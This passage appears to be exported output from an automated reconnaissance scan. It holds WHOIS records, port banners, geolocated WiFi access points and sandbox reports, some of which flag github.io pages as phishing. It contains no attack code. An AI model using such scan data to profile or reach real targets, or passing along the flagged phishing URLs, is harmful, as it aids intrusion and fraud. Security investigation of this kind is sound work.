domain:"z,u){(this[(((((td.prototype.sw[z=["undo-button-holder","image-button-holder","verify-button-holder"],u=["call",1,"sq"],u[0]](this,w),this.su).render(c[41](68,this,"reload-button-holder")),this.mx.render(c[41](52,this,"audio-button-holder")),this.rr).render(c[41](53,this,z[u[1]])),this.bi).render(c[41](84,this,"help-button-holder")),this.xv).render(c[41](68,this,z[0])),f[13](8,!1,this.xv.g()),u)[2]].render(c[41](68,this,z[2])),this).ee?f[13](22,!1,this.mx.g()):f[13](20,!1,this.rr.g())},u).prototype.nu=" [S |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | cHEEZburger (Category: hobby)
https://profile.cheezburger.com/login | login |
| 2023-05-12 03:24:22 | HTTP Status Code | No | Web Spider | 0 | 2 | 2 | 0 | None | 404 | https://kekw.battleb0t.xyz/jar |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | RPOWER3 (Net ID: 00:02:6F:B3:3B:AA) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:31:33 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com | Domain Name: ASHU.XYZ
Registry Domain ID: D279374777-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://namecheap.com
Updated Date: 2023-03-28T08:17:54.0Z
Creation Date: 2022-03-03T09:34:10.0Z
Registry Expiry Date: 2024-03-03T23:59:59.0Z
Registrar: Namecheap
Registrar IANA ID: 1068
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant State/Province: Capital Region
Registrant Country: IS
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: GRACE.NS.CLOUDFLARE.COM
Name Server: LOGAN.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:37.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: ashu.xyz
Registry Domain ID: D279374777-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-02-22T23:31:01.00Z
Creation Date: 2022-03-03T09:34:10.00Z
Registrar Registration Expiration Date: 2024-03-03T23:59:59.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com
Name Server: grace.ns.cloudflare.com
Name Server: logan.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:17:37.40Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:09:04 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.107 | 87.248.157.102 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SEC_LinkShare_693068 (Net ID: 00:12:FB:E0:05:F2) | 50.8897, 6.0563 |
| 2023-05-12 02:54:13 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 253
Connection: close
CF-RAY: -
| 2606:4700:3030::ac43:a8fc |
| 2023-05-12 02:52:48 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 26, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://optisigns.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:6044:304:WilStaging_02"\n "SM0:6044:120:WilError_01"\n "Local\\SM0:6044:120:WilError_01"\n "SM0:6044:304:WilStaging_02"\n "InternetShortcutMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"75.2.70.75:80"\n "138.91.254.96:443"\n "75.2.70.75:443"\n "52.25.204.60:443"\n "65.8.158.16:443"\n "142.250.191.42:443"\n "172.64.132.15:443"\n "185.199.108.153:443"\n "151.101.1.229:443"\n "104.19.255.88:443"\n "69.16.175.42:443"\n "65.8.165.144:443"\n "104.17.24.14:443"\n "142.250.191.35:443"\n "142.251.46.234:443"\n "157.230.203.149:443"\n "65.8.158.126:443"\n "169.150.221.147:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': 
u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"optisigns.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"a.omappapi.com"\n "a.opmnstr.com"\n "ajax.googleapis.com"\n "alb.reddit.com"\n "api.edgeoffer.microsoft.com"\n "api.omappapi.com"\n "app.clearbit.com"\n "app.termly.io"\n "assets-tracking.crazyegg.com"\n "cdn.jetboost.io"\n "cdn.jsdelivr.net"\n "cdn.linkedin.oribi.io"\n "cdnjs.cloudflare.com"\n "code.jquery.com"\n "connect.facebook.net"\n "customerioforms.com"\n "d3e54v103j8qbb.cloudfront.net"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "forms.hscollectedforms.net"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "src="https://www.facebook.com/tr?id=1046181442239428&ev=PageView&noscript=1"" (Indicator: "dir "; File: "urlref_httpoptisigns.com")\n Found string ""url": "https://www.youtube.com/watch?v=Qan_OvBeUpc"," (Indicator: "dir "; File: "urlref_httpoptisigns.com")\n Found string ""originalUrl": "https://www.youtube.com/watch?v=Qan_OvBeUpc"," (Indicator: "dir "; File: "urlref_httpoptisigns.com")\n file/memory contains long string with (Indicator: "dir "; File: "urlref_httpoptisigns.com")\n Found string ""url": "https://www.youtube.com/watch?v=oa2hb64HdfY"," (Indicator: "dir "; File: "urlref_httpoptisigns.com")\n Found string ""originalUrl": "https://www.youtube.com/watch?v=oa2hb64HdfY"," (Indicator: "dir "; File: 
"urlref_httpoptisigns.com")\n Found string ""url": "https://www.youtube.com/watch?v=HsxOzOtdJEU"," (Indicator: "dir "; File: "urlref_httpoptisigns.com")\n Found string ""originalUrl": "https://www.youtube.com/watch?v=HsxOzOtdJEU"," (Indicator: "dir "; File: "urlref_httpoptisigns.com")\n Found string "</svg></div></a><a href="https://twitter.com/OptiSignsInc" target="_blank" class="w-inline-block"><div class="social-icon w-embed"><svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">" (Indicator: "dir "; File: "urlref_httpoptisigns.com")\n Found string "www.facebook.com" (Indicator: "dir "; File: "PCAP")\n Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: 
"key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens-journal"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\edgecoupons\\coupons_data.db\\log"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\autofill\\3.0.0.3\\manifest.json"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\edge kids mode\\0.0.0.10\\manifest.json"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\edge kids mode\\0.0.0.10\\manifest.fingerprint"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\eadpdata component\\4.0.2.16\\manifest.json"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\eadpdata component\\4.0.2.16\\manifest.fingerprint"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\autofill\\3.0.0.3\\manifest.fingerprint"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\extension state\\current"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\extension state\\manifest-000001"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\extension state\\000003.log"\n "msedge.exe" reads file "\\device\\namedpipe\\local\\mojo.3784.704.8066580413151223232"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpoptisigns.com" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log 
version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003784]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00007716]\n "Ruleset Data" has type "data"- [targetUID: 00000000-00003784]\n "wallet-pre-stabl | 185.199.108.153 |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.233): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:01:F4:5B:7B:F7) | 34.0544, -118.244 |
| 2023-05-12 02:48:26 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://1inchh.github.io/', u'signatures': [{u'category': u'General', u'origin': u'Loaded Module', u'identifier': u'module-11', u'name': u'Loaded modules', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 0, u'threat_level': 0, u'type': 10, u'description': u'"iexplore.exe" loaded module "%WINDIR%\\System32\\ole32.dll" at 750C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\oleaut32.dll" at 75BE0000\n "iexplore.exe" loaded module "%WINDIR%\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\\comctl32.dll" at 73C00000\n "iexplore.exe" loaded module "%WINDIR%\\WindowsShell.Manifest" at 00430000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\IEShims.dll" at 69090000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dwmapi.dll" at 739A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\winhttp.dll" at 70440000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\clbcatq.dll" at 75E50000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\cryptsp.dll" at 74790000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rsaenh.dll" at 004F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rsaenh.dll" at 74520000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\RpcRtRemote.dll" at 74D20000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\npmproxy.dll" at 6E1A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\FWPUCLNT.DLL" at 72C70000\n "iexplore.exe" loaded module 
"%WINDIR%\\System32\\crypt32.dll" at 74EF0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msasn1.dll" at 74DA0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\en-US\\user32.dll.mui" at 01E90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\setupapi.dll" at 75CB0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\cfgmgr32.dll" at 75020000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\devobj.dll" at 74ED0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\mscoree.dll" at 690F0000\n "iexplore.exe" loaded module "%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" at 671A0000\n "iexplore.exe" loaded module "%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" at 66430000\n "iexplore.exe" loaded module "%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" at 65E80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\sxs.dll" at 74C90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\en-US\\KernelBase.dll.mui" at 035B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\credssp.dll" at 74450000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ncrypt.dll" at 748C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\bcrypt.dll" at 748A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\bcryptprimitives.dll" at 74460000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wintrust.dll" at 74E40000\n "iexplore.exe" loaded module "%LOCALAPPDATA%\\ow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" at 037F0000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\iexplore.exe" at 043A0000\n "iexplore.exe" loaded module "%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" at 65790000\n "iexplore.exe" loaded module "%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" at 651E0000\n "iexplore.exe" loaded module "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Caches\\cversions.2.db" at 021D0000\n "iexplore.exe" loaded module 
"%WINDIR%\\System32\\kernel32.dll" at 759C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\KernelBase.dll" at 75050000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msvcrt.dll" at 76030000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-advapi32-l1-1-0.dll" at 74EA0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\advapi32.dll" at 75EE0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\sechost.dll" at 77020000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rpcrt4.dll" at 754D0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\iertutil.dll" at 75580000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-version-l1-1-0.dll" at 750A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\version.dll" at 74300000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-user32-l1-1-0.dll" at 74E90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\user32.dll" at 757C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\gdi32.dll" at 75970000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\lpk.dll" at 77060000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\usp10.dll" at 75F90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-normaliz-l1-1-0.dll" at 750B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\normaliz.dll" at 77010000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-shlwapi-l1-1-0.dll" at 74E80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\shlwapi.dll" at 77070000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\imm32.dll" at 000E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\imm32.dll" at 77040000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msctf.dll" at 75AF0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\cryptbase.dll" at 74C80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ws2_32.dll" at 76FD0000\n "iexplore.exe" loaded module 
"%WINDIR%\\System32\\nsi.dll" at 75BD0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\fltLib.dll" at 6FF60000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-core-synch-l1-2-0.dll" at 72500000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\sspicli.dll" at 74C10000\n "iexplore.exe" loaded module "%WINDIR%\\Globalization\\Sorting\\SortDefault.nls" at 01EF0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-shell32-l1-1-0.dll" at 71E80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\shell32.dll" at 76230000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ieframe.dll" at 6C860000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\comdlg32.dll" at 75890000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\uxtheme.dll" at 737C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\urlmon.dll" at 760E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-ole32-l1-1-0.dll" at 74E70000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wininet.dll" at 75220000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\profapi.dll" at 74D90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\userenv.dll" at 74EB0000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\sqmapi.dll" at 72540000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\secur32.dll" at 74AC0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-advapi32-l2-1-0.dll" at 71580000\n "iexplore.exe" loaded module "%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat" at 00460000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\webio.dll" at 703F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\mswsock.dll" at 74750000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-shlwapi-l2-1-0.dll" at 68E00000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wship6.dll" at 74740000\n "iexplore.exe" loaded module 
"%WINDIR%\\System32\\IPHLPAPI.DLL" at 742E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\winnsi.dll" at 742D0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\netprofm.dll" at 6E7E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\nlaapi.dll" at 72F70000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\netapi32.dll" at 732F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\netutils.dll" at 732E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\srvcli.dll" at 749A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wkscli.dll" at 732D0000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\ieproxy.dll" at 69220000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\WSHTCPIP.DLL" at 741F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dnsapi.dll" at 74610000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rasadhlp.dll" at 715A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\apphelp.dll" at 74C30000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ieui.dll" at 69010000\n "iexplore.exe" loaded module "%WINDIR%\\Fonts\\StaticCache.dat" at 038A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\WindowsCodecs.dll" at 733F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\oleacc.dll" at 71740000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\oleaccrc.dll" at 02830000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ExplorerFrame.dll" at 70830000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\duser.dll" at 73A10000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dui70.dll" at 73560000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msimg32.dll" at 72640000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\en-US\\msctf.dll.mui" at 037D0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dhcpcsvc6.dll" at 72C40000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dhcpcsvc.dll" at 74200000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\mlang.dll" at 
691F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\propsys.dll" at 73AC0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ntmarta.dll" at 742A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\Wldap32.dll" at 75AA0000\n "iexplore.exe" loaded module "%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000030.db" at 03840000\n "iexplore.exe | 185.199.110.153 |
| 2023-05-12 02:45:39 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://klliii.github.io/clone-netflix/', u'type': u'submitted', u'verdict': u'suspicious'}, {u'url': u'http://klliii.github.io/clone-netflix', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://klliii.github.io/clone-netflix/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_dd4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "UpdatingNewTabPageData"\n "IsoScope_dd4_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n 